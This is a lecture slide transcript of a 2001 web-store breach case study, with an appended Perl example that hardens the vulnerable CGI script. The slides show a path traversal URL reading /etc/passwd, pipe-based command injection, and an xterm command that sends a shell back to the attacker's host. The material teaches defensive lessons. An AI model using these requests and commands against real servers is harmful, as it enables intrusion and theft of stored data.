
Hacking Case Study


Presentation Transcript


  1. Hacking Case Study Sungchul Hong

  2. Acme Art, Inc. Case
  • October 31, 2001
  • www.acme-art.com
  • A hacker stole credit card numbers from the online store's database.
  • A firewall was installed.
  • Only ports 80 and 443 were open.
  • Computer forensics teams found the following:

  3. Server Environment
  • Apache 1.312 on a Linux system
  • A Perl CGI script was used

  4. The hacker looks around the web pages and clicks on images.

  5. http://www.acme-art.com/index.cgi?page=tahoe1.shtml

  6. Hacker's Move
  • http://www.acme-art.com/index.cgi?page=index.cgi
  • 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
  • The hacker sees that index.cgi accepts a filename as a parameter and displays the contents of that file.
  • He uses index.cgi itself as the parameter to display its own source code.

  7. Vulnerability Revealed
  • The source of the index.cgi page is revealed.
  • *** No parameter type checking ***

  8. Vulnerability
  • The hacker guesses the system file name and its path, then opens it.

  9. Error Message
  • The error message reveals the programming secret.

  10. Hacker's Next Move
  • http://www.acme-art.com/index.cgi?page=/../../../../../../../../../etc/passwd (writes the passwd file to the screen)

  11. Message
  • The entire contents of the /etc/passwd file are returned and displayed in the browser.
  • root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:
    daemon:x:2:2:daemon:/sbin:
    adm:x:3:4:adm:/var/adm:
    lp:x:4:7:lp:/var/spool/lpd:
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    …

  12. Next Move
  • The hacker uses the pipe character in the file parameter, followed by commands of his choice. Now, instead of a file being opened, Perl opens a file handle that receives the standard output generated by the commands specified in the file name parameter.

  13. Code
  • ls -la /   /* reveals the files in the root directory
  • id         /* get the process id for index.cgi
  • which xterm   /* path to the xterm binary
  • (use hex 0A for the line feed)
  • Now the hacker can run any command on the Web server under the security privileges of the "nobody" account.

  14. Use xterm to gain interactive shell access to the Web server.
  • xterm -display 10.0.1.21:0.0 &  (The xterm command launches an xterm window back to the attacker's display on 10.0.1.21:0.0)

  15. Hacker's View
  • bash$ id
  • uid=99(nobody) gid=99(nobody) groups=99(nobody)
  • bash$ pwd
  • /usr/local/apache/htdocs
  • bash$

  16. Note
  • The attacker used port 80 (the HTTP port).
  • Only HTTP was used.
  • The firewall could not help.
  • Lessons:
  • All inputs must be checked.
  • Do not show unnecessary information.
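The root cause in the slides is a Perl CGI that passes the user-supplied page parameter straight into a two-argument open(), so "../" walks out of the document root and a trailing "|" turns the argument into a command pipe. The following is an added example, not the Acme Art script or any code from the presentation; it places that vulnerable pattern beside a hardened version (allowlisted filename, three-argument open with an explicit read mode, generic error text). The document root path and the hypothetical function names are assumptions.

```perl
#!/usr/bin/perl
# Added example: vulnerable index.cgi pattern versus a hardened loader.
use strict;
use warnings;
use File::Spec;

my $DOCROOT = '/usr/local/apache/htdocs';   # assumed document root

# VULNERABLE (the pattern the slides describe): two-argument open() treats
# the string as a mode/filename spec, so "../../etc/passwd" traverses out of
# the docroot and a name ending in "|" is run as a command instead of opened.
sub show_page_vulnerable {
    my ($page) = @_;
    open(my $fh, "$DOCROOT/$page") or return "error: $!";   # <- the bug
    local $/; my $body = <$fh>; close $fh;
    return $body;
}

# HARDENED: allowlist the name, anchor it under the docroot, and never let
# user data choose the open mode. Returns undef for anything not permitted.
sub safe_page_path {
    my ($page) = @_;
    # Only plain names such as "tahoe1.shtml": no '/', '..', '|', NUL or spaces.
    return undef unless defined $page && $page =~ /\A([A-Za-z0-9_-]{1,64}\.s?html)\z/;
    my $path = File::Spec->catfile($DOCROOT, $1);
    return undef unless index($path, "$DOCROOT/") == 0;   # belt-and-braces check
    return $path;
}

sub show_page_safe {
    my ($page) = @_;
    my $path = safe_page_path($page);
    return "403 Forbidden\n" unless defined $path;
    # Three-argument open with an explicit '<' mode: the name can never be a pipe.
    # The error text is generic so no path or code details leak (slide 9 / 16).
    open(my $fh, '<', $path) or return "404 Not Found\n";
    local $/; my $body = <$fh>; close $fh;
    return $body;
}

# Constructed inputs taken from the slides' requests.
for my $p ('tahoe1.shtml', 'index.cgi', '/../../../../../../etc/passwd', 'ls -la /|') {
    printf "%-36s -> %s\n", $p, defined(safe_page_path($p)) ? 'allowed' : 'rejected';
}
```

Only the first input is allowed; the script's own source, the traversal and the pipe form are all rejected before any open() call is made.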
